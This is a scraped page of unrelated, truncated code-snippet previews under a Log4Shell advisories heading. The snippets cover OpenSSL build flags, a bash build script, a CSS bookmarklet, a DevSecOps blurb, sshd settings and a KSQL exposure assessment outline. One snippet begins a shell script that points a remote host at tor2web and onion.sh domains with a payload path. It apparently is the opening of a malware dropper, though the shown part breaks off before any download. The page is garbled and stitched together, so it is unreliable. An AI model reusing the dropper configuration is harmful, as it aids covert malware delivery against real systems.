Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)
| make clean | |
| ./Configure no-ssl2 no-ssl3 no-tls1 no-tls1_1 no-zlib no-comp no-dtls no-dtls1 no-dtlsi1_2 no-psk no-srp no-srtp no-capieng no-cms no-asm no-weak-ssl-ciphers no-dso no-gost no-hw-padlock no-rfc3779 no-ts no-aria no-bf no-blake2 no-camellia no-cast no-cmac no-des no-dsa enable-ec_nistp_64_gcc_128 no-idea no-md4 no-mdc2 no-ocb no-rc2 no-rc4 no-rmd16@ no-scrypt no-seed no-siphash no-sm2 no-sm3 no-sm4 no-whirlpool -02 -fno-strict-aliasing |
| def is_valid_state(state): | |
| # check if it is a valid solution | |
| return True | |
| def get_candidates(state): | |
| return [] | |
| def search(state, solutions): | |
| if is_valid_state(state): | |
| solutions.append(state.copy()) |
| #!/usr/bin/env bash | |
| # Based on https://gist.github.com/eduncan911/68775dba9d3c028181e4 | |
| # but improved to use the `go` command so it never goes out of date. | |
| type setopt >/dev/null 2>&1 | |
| contains() { | |
| # Source: https://stackoverflow.com/a/8063398/7361270 | |
| [[ $1 =~ (^|[[:space:]])$2($|[[:space:]]) ]] |
| // create a bookmark and use this code as the URL, you can now toggle the css on/off | |
| // thanks+credit: https://dev.to/gajus/my-favorite-css-hack-32g3 | |
| javascript: (function() { | |
| var domStyle = document.createElement("style"); | |
| domStyle.append( | |
| '* { color:#0f0!important;outline:solid #f00 1px!important; background-color: rgba(255,0,0,.2) !important; }\ | |
| * * { background-color: rgba(0,255,0,.2) !important; }\ | |
| * * * { background-color: rgba(0,0,255,.2) !important; }\ | |
| * * * * { background-color: rgba(255,0,255,.2) !important; }\ | |
| * * * * * { background-color: rgba(0,255,255,.2) !important; }\ |
DevSecOps has finally become popular within the wider IT industry in 2019. I started as a web developer in 2001, learned about testing automation, system deployment automation, and "infrastructure as code" in 2012, when DevOps was becoming a popular term. DevOps became common after the release of The Phoenix Project in Jan 2013. It has taken 7+ years for security to become integrated within the DevOps methodology. The following is a list of concepts I go through with project owners, project managers, operations, developers, and security teams, to help establish how mature their DevOps and security automation is, and to help them increase that maturity over time. This model is based on experience consulting with a variety of US Financial, Healthcare, and Department of Defense, organizations, and combines:
| #!/bin/sh | |
| SHELL=/bin/sh | |
| PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin | |
| RHOST="https://an7kmd2wp4xo7hpr" | |
| TOR1=".tor2web.su/" | |
| TOR2=".tor2web.io/" | |
| TOR3=".onion.sh/" | |
| RPATH1='src/ldm' | |
| #LPATH="${HOME-/tmp}/.cache/" | |
| TIMEOUT="75" |
| default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam' | |
| default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes' | |
| default['sshd']['sshd_config']['PasswordAuthentication'] = 'no' |
| Video: https://youtu.be/2OWtEymBQfA | |
| 1. Quick Assessment - Running Nessus and NMAP | |
| -- Nessus primarily to see if it detects open KSQL (Spoiler: It doesn't) | |
| -- NMAP to identify whatports are open | |
| 2. Seeing what is possible from an exposed KSQL/Kafka Port | |
| -- Download and extract: https://github.com/Cyb3rWard0g/HELK/wiki/Deploy-KSQL-CLI-Locally | |
| -- ./ksql http://172.16.10.10:8088 | |
| -- Run the commands: |
| #!/usr/bin/python | |
| #License | |
| #Copyright 2019 Mike Weaver | |
| # | |
| #Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: | |
| # | |
| #The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. | |
| # | |
| #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WIT |
